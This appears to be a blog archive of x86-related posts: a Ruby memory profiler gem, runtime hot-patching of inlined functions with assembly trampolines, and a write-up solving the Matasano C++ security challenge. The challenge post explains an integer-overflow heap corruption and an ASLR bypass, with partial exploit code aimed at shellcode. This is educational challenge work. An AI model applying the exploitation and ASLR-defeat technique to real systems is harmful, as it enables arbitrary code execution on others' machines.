Archive for the ‘x86’ tag
memprof: A Ruby level memory profiler

If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.
What is memprof and why do I care?
memprof is a Ruby gem which supplies memory profiler functionality similar to bleak_house without patching the Ruby VM. You just install the gem, call a function or two, and off you go.
Where do I get it?
memprof is available on gemcutter, so you can just:
gem install memprof
Feel free to browse the source code at: http://github.com/ice799/memprof.
How do I use it?
Using memprof is simple. Before we look at some examples, let me explain more precisely what memprof is measuring.
memprof is measuring the number of objects created and not destroyed during a segment of Ruby code. The ideal use case for memprof is to show you where objects that do not get destroyed are being created:
- Objects are created and not destroyed when you create new classes. This is a good thing.
- Sometimes garbage objects sit around until
garbage_collecthas had a chance to run. These objects will go away. - Yet in other cases you might be holding a reference to a large chain of objects without knowing it. Until you remove this reference, the entire chain of objects will remain in memory taking up space.
memprof will show objects created in all cases listed above.
OK, now Let’s take a look at two examples and their output.
A simple program with an obvious memory “leak”:
require 'memprof'
@blah = Hash.new([])
Memprof.start
100.times {
@blah[1] << "aaaaa"
}
1000.times {
@blah[2] << "bbbbb"
}
Memprof.stats
Memprof.stop
This program creates 1100 objects which are not destroyed during the start and stop sections of the file because references are held for each object created.
Let's look at the output from memprof:
1000 test.rb:11:String
100 test.rb:7:String
In this example memprof shows the 1100 created, broken up by file, line number, and type.
Let's take a look at another example:
require 'memprof' Memprof.start require "stringio" StringIO.new Memprof.stats
This simple program is measuring the number of objects created when requiring stringio.
Let's take a look at the output:
108 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:__node__
14 test2.rb:3:String
2 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Class
1 test2.rb:4:StringIO
1 test2.rb:4:String
1 test2.rb:3:Array
1 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Enumerable
This output shows an internal Ruby interpreter type __node__ was created (these represent code), as well as a few Strings and other objects. Some of these objects are just garbage objects which haven't had a chance to be recycled yet.
What if nudge the garbage_collector along a little bit just for our example? Let's add the following two lines of code to our previous example:
GC.start Memprof.stats
We're now nudging the garbage collector and outputting memprof stats information again. This should show fewer objects, as the garbage collector will recycle some of the garbage objects:
108 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:__node__
2 test2.rb:3:String
2 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Class
1 /custom/ree/lib/ruby/1.8/x86_64-linux/stringio.so:0:Enumerable
As you can see above, a few Strings and other objects went away after the garbage collector ran.
Which Rubies and systems are supported?
- Only unstripped binaries are supported. To determine if your Ruby binary is stripped, simply run:
file `which ruby`. If it is, consult your package manager's documentation. Most Linux distributions offer a package with an unstripped Ruby binary. - Only x86_64 is supported at this time. Hopefully, I'll have time to add support for i386/i686 in the immediate future.
- Linux Ruby Enterprise Edition (1.8.6 and 1.8.7) is supported.
- Linux MRI Ruby 1.8.6 and 1.8.7 built with --disable-shared are supported. Support for --enable-shared binaries is coming soon.
- Snow Leopard support is experimental at this time.
- Ruby 1.9 support coming soon.
How does it work?
If you've been reading my blog over the last week or so, you'd have noticed two previous blog posts (here and here) that describe some tricks I came up with for modifying a running binary image in memory.
memprof is a combination of all those tricks and other hacks to allow memory profiling in Ruby without the need for custom patches to the Ruby VM. You simply require the gem and off you go.
memprof works by inserting trampolines on object allocation and deallocation routines. It gathers metadata about the objects and outputs this information when the stats method is called.
What else is planned?
Myself, Jake Douglas, and Aman Gupta have lots of interesting ideas for new features. We don't want to ruin the surprise, but stay tuned. More cool stuff coming really soon :)
Thanks for reading and don't forget to subscribe (via RSS or e-mail) and follow me on twitter.
Hot patching inlined functions with x86_64 asm metaprogramming

If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.
Disclaimer
The tricks, techniques, and ugly hacks in this article are PLATFORM SPECIFIC, DANGEROUS, and NOT PORTABLE.
This article will make reference to information in my previous article Rewrite your Ruby VM at runtime to hot patch useful features so be sure to check it out if you find yourself lost during this article.
Also, this might not qualify as metaprogramming in the traditional definition1, but this article will show how to generate assembly at runtime that works well with the particular instructions generated for a binary. In other words, the assembly is constructed based on data collected from the binary at runtime. When I explained this to Aman, he called it assembly metaprogramming.
TLDR
This article expands on a previous article by showing how to hook functions which are inlined by the compiler. This technique can be applied to other binaries, but the binary in question is Ruby Enterprise Edition 1.8.7. The use case is to build a memory profiler without requiring patches to the VM, but just a Ruby gem.
It’s on GitHub
The memory profiler is NOT DONE, yet. It will be soon. Stay tuned.
The code described here is incorporated into a Ruby Gem which can be found on github: http://github.com/ice799/memprof specifically at: http://github.com/ice799/memprof/blob/master/ext/memprof.c#L202-318
Overview of the plan of attack
The plan of attack is relatively straight forward:
- Find the inlined code.
- Overwrite part of it to redirect to a stub.
- Call out to a handler from the stub.
- Make sure the return path is sane.
As simple as this seems, implementing these steps is actually a bit tricky.
Finding pieces of inlined code
Before finding pieces of inlined code, let’s first examine the C code we want to hook. I’m going to be showing how to hook the inline function add_freelist.
The code for add_freelist is short:
static inline void
add_freelist(p)
RVALUE *p;
{
if (p->as.free.flags != 0)
p->as.free.flags = 0;
if (p->as.free.next != freelist)
p->as.free.next = freelist;
freelist = p;
}
There is one really important feature of this code which stands out almost immediately. freelist has (at least) compilation unit scope. This is awesome because freelist serves as a marker when searching for assembly instructions to overwrite. Since the freelist has compilation unit scope, it’ll live at some static memory location.
If we find writes to this static memory location, we find our inline function code.
Let’s take a look at the instructions generated from this C code (unrelated instructions snipped out):
437f21: 48 c7 00 00 00 00 00 movq $0x0,(%rax) . . . . . 437f2c: 48 8b 05 65 de 2d 00 mov 0x2dde65(%rip),%rax # 715d98 [freelist] . . . . . 437f48: 48 89 05 49 de 2d 00 mov %rax,0x2dde49(%rip) # 715d98 [freelist]
The last instruction above updates freelist, it is the instruction generated for the C statement freelist = p;.
As you can see from the instruction, the destination is freelist. This makes it insanely easy to locate instances of this inline function. Just need to write a piece of C code which scans the binary image in memory, searching for mov instructions where the destination is freelist and I’ve found the inlined instances of add_freelist.
Why not insert a trampoline by overwriting that last mov instruction?
Overwriting with a jmp
The mov instruction above is 7 bytes wide. As long as the instruction we’re going to implant is 7 bytes or thinner, everything is good to go. Using a callq is out of the question because we can’t ensure the stack is 16-byte aligned as per the x86_64 ABI2. As it turns out, a jmp instruction that uses a 32bit displacement from the instruction pointer only requires 5 bytes. We’ll be able to implant the instruction that’s needed, and even have room to spare.
I created a struct to encapsulate this short 7 byte trampoline. 5 bytes for the jmp, 2 bytes for NOPs. Let’s take a look:
struct tramp_inline tramp = {
.jmp = {'\xe9'},
.displacement = 0,
.pad = {'\x90', '\x90'},
};
Let’s fill in the displacement later, after actually finding the instruction that’s going to get overwritten.
So, to find the instruction that’ll be overwritten, just look for a mov opcode and check that the destination is freelist:
/* make sure it is a mov instruction */
if (byte[1] == '\x89') {
/* Read the REX byte to make sure it is a mov that we care about */
if ( (byte[0] == '\x48') ||
(byte[0] == '\x4c') ) {
/* Grab the target of the mov. REMEMBER: in this case the target is
* a 32bit displacment that gets added to RIP (where RIP is the adress of
* the next instruction).
*/
mov_target = *(uint32_t *)(byte + 3);
/* Sanity check. Ensure that the displacement from freelist to the next
* instruction matches the mov_target. If so, we know this mov is
* updating freelist.
*/
if ( (freelist - (void *)(byte+7) ) == mov_target) {
At this point we’ve definitely found a mov instruction with freelist as the destination. Let’s calculate the displacement to the stage 2 trampoline for our jmp instruction and write the instruction into memory.
/* Setup the stage 1 trampoline. Calculate the displacement to
* the stage 2 trampoline from the next instruction.
*
* REMEMBER!!!! The next instruction will be NOP after our stage 1
* trampoline is written. This is 5 bytes into the structure, even
* though the original instruction we overwrote was 7 bytes.
*/
tramp.displacement = (uint32_t)(destination - (void *)(byte+5));
/* Figure out what page the stage 1 tramp is gonna be written to, mark
* it WRITE, write the trampoline in, and then remove WRITE permission.
*/
aligned_addr = page_align(byte);
mprotect(aligned_addr, (void *)byte - aligned_addr + 10,
PROT_READ|PROT_WRITE|PROT_EXEC);
memcpy(byte, &tramp, sizeof(struct tramp_inline));
mprotect(aligned_addr, (void *)byte - aligned_addr + 10,
PROT_READ|PROT_EXEC);
Cool, all that’s left is to build the stage 2 trampoline which will set everything up for the C level handler.
An assembly stub to set the stage for our C handler
So, what does the assembly need to do to call the C handler? Quite a bit actually so let’s map it out, step by step:
- Replicate the instruction which was overwritten so that the object is actually added to the freelist.
- Save the value of
rdiregister. This register is where the first argument to a function lives and will store the obj that was added to the freelist for the C handler to do analysis on. - Load the object being added to the freelist into
rdi - Save the value of
rbxso that we can use the register as an operand for an absolute indirectcallqinstruction. - Save
rbpandrspto allow a way to undo the stack alignment later. - Align the stack to a 16-byte boundary to comply with the x86_64 ABI.
- Move the address of the handler into
rbx - Call the handler through
rbx. - Restore
rbp,rsp,rdi,rbx. - Jump back to the instruction after the instruction which was overwritten.
To accomplish this let’s build out a structure with as much set up as possible and fill in the displacement fields later. This “base” struct looks like this:
struct inline_tramp_tbl_entry inline_ent = {
.rex = {'\x48'},
.mov = {'\x89'},
.src_reg = {'\x05'},
.mov_displacement = 0,
.frame = {
.push_rdi = {'\x57'},
.mov_rdi = {'\x48', '\x8b', '\x3d'},
.rdi_source_displacement = 0,
.push_rbx = {'\x53'},
.push_rbp = {'\x55'},
.save_rsp = {'\x48', '\x89', '\xe5'},
.align_rsp = {'\x48', '\x83', '\xe4', '\xf0'},
.mov = {'\x48', '\xbb'},
.addr = error_tramp,
.callq = {'\xff', '\xd3'},
.leave = {'\xc9'},
.rbx_restore = {'\x5b'},
.rdi_restore = {'\x5f'},
},
.jmp = {'\xe9'},
.jmp_displacement = 0,
};
So, what’s left to do:
- Copy the REX and source register bytes of the instruction which was overwritten to replicate it.
- Calculate the displacement to
freelistto fully generate the overwrittenmov. - Calculate the displacement to
freelistso that it can be stored inrdias an argument to the C handler. - Fill in the absolute address for the handler.
- Calculate the displacement to the instruction after the stage 1 trampoline in order to
jmpback to resume execution as normal.
Doing that is relatively straight-forward. Let’s take a look at the C snippets that make this happen:
/* Before the stage 1 trampoline gets written, we need to generate
* the code for the stage 2 trampoline. Let's copy over the REX byte
* and the byte which mentions the source register into the stage 2
* trampoline.
*/
inl_tramp_st2 = inline_tramp_table + entry;
inl_tramp_st2->rex[0] = byte[0];
inl_tramp_st2->src_reg[0] = byte[2];
. . . . .
/* Finish setting up the stage 2 trampoline. */
/* calculate the displacement to freelist from the next instruction.
*
* This is used to replicate the original instruction we overwrote.
*/
inl_tramp_st2->mov_displacement = freelist - (void *)&(inl_tramp_st2->frame);
/* fill in the displacement to freelist from the next instruction.
*
* This is to arrange for the new value in freelist to be in %rdi, and as such
* be the first argument to the C handler. As per the amd64 ABI.
*/
inl_tramp_st2->frame.rdi_source_displacement = freelist -
(void *)&(inl_tramp_st2->frame.push_rbx);
/* jmp back to the instruction after stage 1 trampoline was inserted
*
* This can be 5 or 7, it doesn't matter. If its 5, we'll hit our 2
* NOPS. If its 7, we'll land directly on the next instruction.
*/
inl_tramp_st2->jmp_displacement = (uint32_t)((void *)(byte + 7) -
(void *)(inline_tramp_table + entry + 1));
/* write the address of our C level trampoline in to the structure */
inl_tramp_st2->frame.addr = freelist_tramp;
Awesome.
We’ve successfully patched the binary in memory, inserted an assembly stub which was generated at runtime, called a hook function, and ensured that execution can resume normally.
So, what’s the status on that memory profiler?
Almost done, stay tuned for more updates coming SOON.
Conclusion
- Hackery like this is unmaintainable, unstable, stupid, but also fun to work on and think about.
- Being able to hook
add_freelistlike this provides the last tool needed to implement a version of bleak_house (a Ruby memory profiler) without patching the Ruby VM. - x86_64 instruction set is a painful instruction set.
- Use the GNU assembler (gas) instead of trying to generate opcodes by reading the Intel instruction set PDFs if you value your sanity.
Thanks for reading and don’t forget to subscribe (via RSS or e-mail) and follow me on twitter.
References
Debugging Ruby: Understanding and Troubleshooting the VM and your Application
Download the PDF here.
Defeating the Matasano C++ Challenge with ASLR enabled

If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.
Important note
I am NOT a security researcher (I kinda want to be though). As such, there are probably way better ways to do everything in this article. This article is just illustrating my thought process when cracking this challenge.
The Challenge
The Matasano Security blog recently posted an article titled A C++ Challenge1 which included a particularly ugly piece of C++ code that has a security vulnerability. The challenge is for the reader to find the vulnerability, use it execute arbitrary code, and submit the data to Matasano.
Sounds easy enough, let’s do this! cue hacking music
Making it harder
Recent linux kernels have feature called Address Space Layout Randomization (ASLR) which can be set in /proc/sys/kernel/randomize_va_space. ASLR is a security feature which randomizes the start address of various parts of a process image. Doing this makes exploiting a security bug more difficult because the exploit cannot use any hard coded addresses.
The options you can set are:
- 0 – ASLR off
- 1 – Randomize the addresses of the stack, mmap area, and VDSO page. This is the default.
- 2 – Everything in option 1, but also randomize the
brkarea so the heap is randomized.
Just for fun I decided to set it to 2 to make exploiting the challenge more difficult.
Got the code, but now what?
I decided to start attacking this problem by looking for a few common errors, in this order:
strcpy()/strncpy()bugs No callsmemcpy()bugs A few calls- Off by one bugs None obvious
It turned out from a quick look that all calls to memcpy() included sane, hard-coded values. So, it had to be something more complex.
Digging deeper – finding input streams the user can control
Next, I decided to actually read the code and see what it was doing at a high level and what inputs could be controlled. Turns out that the program reads data from a file and uses the data from the file to determine how many objects to allocate.
Obviously, this portion of the code caught my interest so let’s take a quick look:
/* ... */
fd.read(file_in_mem, MAX_FILE_SIZE-1);
/* ... */
struct _stream_hdr *s = (struct _stream_hdr *) file_in_mem;
if(s->num_of_streams >= INT_MAX / (int)sizeof(int)) {
safe_count = MAX_STREAMS;
} else {
safe_count = s->num_of_streams;
}
Obj *o = new Obj[safe_count];
OK, so clearly that if statement is suspect. At the very least it doesn’t check for negative values, so you could end up with safe_count = -1 which might do something interesting when passed to the new operator. Moreover, it appears this if statement will allow values as large as 536870910 ([INT_MAX / sizeof(int)] – 1).
Maybe the exploit has something to do with values this if statement is allowing through?
A closer look at the integer overflow in new
Let’s use GDB to take a closer look at what the compiler does before calling new. I’ve added a few comments in line to explain the assembly code:
mov %edx,%eax ; %edx and %eax store s->num_of_streams add %eax,%eax ; add %eax to itself (s->num_of_streams * 2) add %edx,%eax ; add s->num_of_streams + %eax (s->num_of_streams*3) shl $0x2,%eax ; multiply (s->num_of_streams * 3) by 4 (s->num_of_streams * 12) mov %eax,(%esp) ; move it into position to pass to new call 0x8048a7c <_Znaj@plt> ; call new
The compiler has generated code to calculate: s->num_of_streams * sizeof(Obj). sizeof(Obj) is 12 bytes. For large values of s->num_of_streams multiplying it by 12, causes an integer overflow and the value passed to new will actually be less than what was intended.
For my exploit, I ended up using the value 357913943. This value causes an overflow, because 357913943 * 12 is greater than the biggest possible value for an integer by 20. So the value passed to new is 20. Which is, of course, significantly less than what we actually wanted to allocate. Other people have written about integer overflow in new in other compilers2 before.
Let’s see how this can be used to cause arbitrary code to execute. Remember, for arbitrary code execution to occur there must be a way to cause the target program to write some data to a memory address that can be controlled.
Find the (possible) hand-off(s) to arbitrary code
To find any hand-off locations, I looked for places where memory writes were occurring in the program. I found a few memory writes:
- 2 calls to
memset() - 2 calls to
memcpy() parse_stream()ofclass Obj
Unfortunately (from the attacker’s perspective) the calls to memcpy() and memset() looked pretty sane. The parse_stream() function caught my interest, though.
Take a look:
class Obj {
public:
int parse_stream(int t, char *stream)
{
type = t;
// ... do something with stream here ...
return 0;
}
int length;
int type;
/* ... */
REMEMBER: In C++, member functions of classes have a sekrit parameter which is a pointer to the object the function is being called on. In the function itself, this parameter is accessed using this. So the line writing to the type variable is actually doing this->type = t; where this is supplied to the function sektrily by the compiler.
This is important because this piece of code could be our hand-off! We need to find a way to control the value of this so we can cause a memory write to a location of our choice.
Controlling this to cause arbitrary code to execute
Take a look at an important piece of code in the challenge:
struct imetad {
int msg_length;
int (*callback)(int, struct imetad *);
/* ... */
Nice! The callback field of struct imetad is offset by 4 bytes into the structure. The type field of class Obj is also offset by 4 bytes. See where I’m going?
If we can control the this pointer to point at the struct imetad on the heap when parse_stream is called, it will overwrite the callback pointer. We’ll then be able to set the pointer to any address we want and hand-off execution to arbitrary code!
But how can we manipulate this?
Take a look at this piece of code that calls callback:
o[i].parse_stream(dword, stream_temp); imd->callback(o[i].type, imd);
Since it is possible to overflow new and allocate fewer objects than safe_count is counting, that means that for some values of i, o[i] will be pointing at data that isn’t actually an Obj object, but just other data on the heap. Infact, when i = 2, o[i] will be pointing at the struct imetad object on the heap. The call to parse_stream will pass in a corrupted this pointer, that points at struct imetad. The write to type will actually overwrite callback since they are both offset equal amounts into their respective structures.
And with that, we’ve successfully exploited the challenge causing arbitrary code to execute.
Let’s now figure out how to beat ASLR!
How to defeat address space layout randomization
I did NOT invent this technique, but I read about it and thought it was cool. You can read a more verbose explanation of this technique here. The idea behind the technique is pretty simple:
- When you call
exec, the PID remains the same, but the image of the process in memory is changed. - The kernel uses the PID and the number of jiffies (jiffies is a fine-grained time measurement in the kernel) to pull data from the entropy pool.
- If you can run a program which records stack, heap, and other addresses and then quickly call
execto start the vulnerable program, you can end up with the same memory layout.
My exploit program is actually a wrapper which records an approximate location of the heap (by just calling malloc()), generates the exploit file, and then executes the challenge binary.
Take a look at the relevant pieces of my exploit to get an idea of how it works:
/* ... */
/* do a malloc to get an idea of where the heap lives */
void *dummy = malloc(10);
/* ... */
unsigned int shell_addr = reinterpret_void_ptr_as_uint(dummy);
/*
* XXX TODO FIXME - on my platform, execl'ing from here to the challenge binary
* incurs a constant offset of 0x3160, probably for changes in the environment
* (libs linked for c++ and whatnot).
*/
shell_addr += 0x3160;
/*
* a guess as to how far off the heap the shellcode lives.
*
* luckily we have a large NOP sled, so we should only fail when we miss
* the current entropy cycle (see below).
*/
shell_addr += 700;
/* ... build exploit file in memory ... */
/* copy in our best guess as to the address of the shellcode, pray NOPs
* take care of the rest! */
memcpy(entire_file+88, &shell_addr, sizeof(shell_addr));
/* ... write exploit out to disk ... */
/* launch program with the generated exploit file!
*
* calling execl here inherits the PID of this process, and IF we get lucky
* ~85%+ of the time, we'll execute before the next entropy cycle and hit
* the shellcode, even with ASLR=2.
*/
execl("./cpp_challenge", "cpp_challenge", "exploit", (char *)0);
My exploit for the C++ challenge
My exploit comes with the following caveats:
- i386 system
- The challenge binary is called “cpp_challenge” and lives in the same directory as the exploit binary.
- The exploit binary can write to the directory and create a file called “exploit” which will be handed off to “cpp_challenge”
Get the full code of my exploit here.
Results
Results on my i386 Ubuntu 8.04 VM running in VMWare fusion, for each level of randomize_va_space:
- 0 – 100% exploit hit rate
- 1 – 100% exploit hit rate
- 2 – ~85% exploit hit rate. Sometimes, my exploit code falls out of the time window and the address map changes before the challenge binary is run
I could probably boost the hit rate for 2 a bit, but then I’d probably re-write the entire exploit in assembly to make it run as fast as possible. I didn’t think there was really a point to going to such an extreme, though. So, an 85% hit rate is good enough.
Conclusion
- Security challenges are fun.
- More emphasis and more freely available information on secure coding would be very useful.
- Like it or not developers need to be security conscious when writing code in C and C++.
- As C and C++ change, developers need to carefully consider security implications of new features.
Thanks for reading and don’t forget to subscribe (via RSS or e-mail) and follow me on twitter.
References
Ruby Hoedown Slides
Below are the slides for a talk that Aman Gupta and I gave at Ruby Hoedown
Download the PDF here
Thanks for reading and don’t forget to subscribe (via RSS or e-mail) and follow me on twitter.

